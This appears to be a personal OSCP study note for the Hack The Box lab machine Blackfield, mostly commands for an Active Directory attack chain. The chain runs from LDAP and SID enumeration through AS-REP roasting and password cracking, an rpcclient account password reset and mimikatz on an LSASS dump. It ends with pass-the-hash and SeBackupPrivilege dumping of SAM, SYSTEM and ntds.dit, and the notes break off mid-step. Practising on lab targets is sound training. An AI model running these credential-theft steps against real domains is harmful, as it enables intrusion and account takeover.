htb-ad-3-Blackfield - My-oscp-all-things

10.10.10.192 ``` Open 10.10.10.192:53 Open 10.10.10.192:88 Open 10.10.10.192:135 Open 10.10.10.192:389 Open 10.10.10.192:445 Open 10.10.10.192:593 Open 10.10.10.192:3268 Open 10.10.10.192:5985 ``` ``` ldapsearch -x -s base namingcontexts -h 10.10.10.192 ``` ![[Pasted image 20220115204257.png]] BLACKFIELD.local ``` ldapsearch -x -D '' -w '' -b "DC=BLACKFIELD,DC=local" -h 10.10.10.192 ``` domain name : BLACKFIELD ### get-userlist ``` impacket-lookupsid [email protected] | tee user.txt ``` ![[Pasted image 20220115205117.png]] we can get a huge user-list ``` impacket-GetNPUsers -no-pass -dc-ip 10.10.10.192 BLACKFIELD.local/ -usersfile user -format hashcat ``` ![[Pasted image 20220115205206.png]] ``` [email protected]:cd519fec4b8458479ce5f1814c19aa1e$3f2353e9aa85c41167a76e566a53439a6d7093b2d175f96f331089fe78e96f584a5edf377778cfd2b851662043f634bca1ee627a972ecdb0ce5e9da9a63dfcfd6423e80e3f45fc90e39e90436b3b27caa0eb1f6956e86793779219001d224099d46f625b824980bca7c13331296cf3535b0593c625ec87368962eb38f039bd2346e8df732c054ffca9d5642e4baa6d12592c61dbf8960c19028ab6ac33a79890ef688d22129c22327dcfabb5a160dfef863ac9d6af41d75133285718ee7eda0377f7898428105a2a8210608a4960bff2172887a2346b49988a0fc39f9141e7bae6cd61d904374fdaca225a4a030d760737a84747 ``` ``` hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt --show support : #00^BlackKnight ``` and we can login winrm, ![[Pasted image 20220115205611.png]] and smbclient to view something ``` ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share forensic NO ACCESS Forensic / Audit share. IPC$ READ ONLY Remote IPC NETLOGON READ ONLY Logon server share profiles$ READ ONLY SYSVOL READ ONLY Logon server share ``` ``` smbclient //10.10.10.192/profiles$ -U "support" sudo mount -t cifs -o user=support //10.10.10.192/profiles$ /lab_test/windows_privilege/htb/ad/Blackfield/mount/test ``` but not find something ``` /opt/Active_domain/bloodhound/BloodHound.py/bloodhound.py -u support -p '#00^BlackKnight' -ns 10.10.10.192 -d blackfield.local -c all ``` ![[Pasted image 20220115212853.png]] mark they high value and try short to this by owner- support ![[Pasted image 20220115212922.png]] but we can't evil-winrm to login support, but we can from rpcclint to reset the audit2020 account information ``` https://malicious.link/post/2017/reset-ad-user-password-with-linux/ setuserinfo2 Audit2020 23 'S3cret123!' crackmapexec smb 10.10.10.192 -u Audit2020 -p 'S3cret123!' ``` ![[Pasted image 20220115213914.png]] ![[Pasted image 20220115214733.png]] ``` smbmap -H 10.10.10.192 -u "audit2020" -p "S3cret123\!" ``` ``` smbclient //10.10.10.192/forensic -U "audit2020" ``` ![[Pasted image 20220115215027.png]] ![[Pasted image 20220115215226.png]] down it can run mimikatz.exe ``` sekurlsa::minidump lsass.DMP log lsass.txt sekurlsa::logonPasswords ``` ![[Pasted image 20220115221001.png]] ``` evil-winrm -i 10.10.10.192 -u 'svc-backup' -H "9658d1d1dcd9250115e2205d9f48400d" ``` ![[Pasted image 20220115221006.png]] ``` whoami /all ``` saw dangers privilege ``` SeBackupPrivilege Back up files and directories Enabled SeRestorePrivilege Restore files and directories Enabled ``` ![[Pasted image 20220115221223.png]] https://github.com/gtworek/Priv2Admin/blob/master/SeBackupPrivilege.md ``` cmd /c "reg save HKLM\SAM SAM & reg save HKLM\SYSTEM SYSTEM" ``` 但是我们还需要HKL\security -> local 但是权限不够，那么我们backup ntds.dit, 位于c:\windows\ntds\ntds.dit ``` echo y |wbadmin start backup -backuptarget:. -include:c:\window s\ntds\ ```